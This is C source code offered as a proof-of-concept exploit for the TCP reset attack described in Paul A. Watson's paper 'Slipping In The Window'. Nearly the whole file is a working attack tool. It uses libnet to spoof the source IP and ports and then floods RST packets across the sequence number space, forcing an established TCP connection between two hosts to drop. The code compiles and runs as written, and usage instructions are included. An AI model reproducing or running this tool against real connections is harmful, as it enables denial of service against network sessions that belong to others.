Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.
498554d722ef08c3079f480800919a02ffb8380999bd74b87840cccf1b571e52
/*
* tcp_reset.c: Proof of concept exploit that demonstrates the vulnerability described
* by Paul A. Watson in his paper "Slipping In The Window: TCP Reset Attacks"
*
* You need libnet 1.1.x
*
* Compile:
* gcc tcp_reset.c -o tcp_reset -lnet
*
* By: eazy <eazy@ondaquadra.org>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <libnet.h>
void
usage(char *prog)
{
fprintf(stderr, "Usage: %s -s <src ip> -d <dst ip> -p <src port> -q <dst port> [-n <seq>] [-w <window size>] [-t <timeout>]\n"
"\t-s\tsource ip address\n"
"\t-d\tdestination ip address\n"
"\t-p\tsource port\n"
"\t-q\tdestination port\n"
"\t-n\tinitial sequence number (default random)\n"
"\t-w\twindow size (default 1000)\n"
"\t-t\tpacket timeout (default 10000 usec)\n"
,prog);
exit(-1);
}
int
main(int argc, char **argv)
{
int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];
memset(&stat, 0, sizeof(stat));
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
usage(argv[0]);
}
if (optind < argc)
usage(argv[0]);
if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);
if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {
tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
usleep(timeout);
}
libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);
bad:
libnet_destroy(l);
exit(-1);
}